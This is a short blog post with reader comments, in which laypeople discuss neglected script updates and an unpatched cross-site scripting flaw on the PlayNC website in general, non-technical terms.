I am too Le Tried to update my script.
A lot of people don't know much about scripting beyond just installing what it tells us to. Phrases like "SQL injection attacks" or "properly sanitizing" your database make us blink a few times and go "huh?" And updating to the latest version of something we to painstakingly installed seems like a waste of time. After all, who'd want to hack your
( Read more... )
Comments 3
They are fixing it 'soon' apparently, but it's a gaping hole for such a large company to still have un-patched, and what makes it worse is that it took a community member posting it on a fansite before it got addressed.
Reply
The security flaw is that their script will echo the html/javascript directly into your browser. With this, a malicious user could steal a session from a user, or, as in the first example, redirect the unsuspecting user to another webpage in the context of the plaync website (phishing)
The link to the login site in the thread is a fake? Or is it an actual link to the PlayNC login but unsecured, enabling someone to steal the account information? Oooor is it like a script executed via the URL that can send your information to another site? OOOOR it has something to do with URL generated security sessions? I'm learning slowly here. A friend said the last it's a pretty common mistake, sadly; some government site did it and I think it happened to Facebook or MySpace as well, enabling people to access private pictures and posts.
Reply
I'm not entirely sure myself how XSS works, but it's detailed in the XSS Wiki page (I think someone linked to it in that original thread - does a better job of explaining it that I will).
Reply
Leave a comment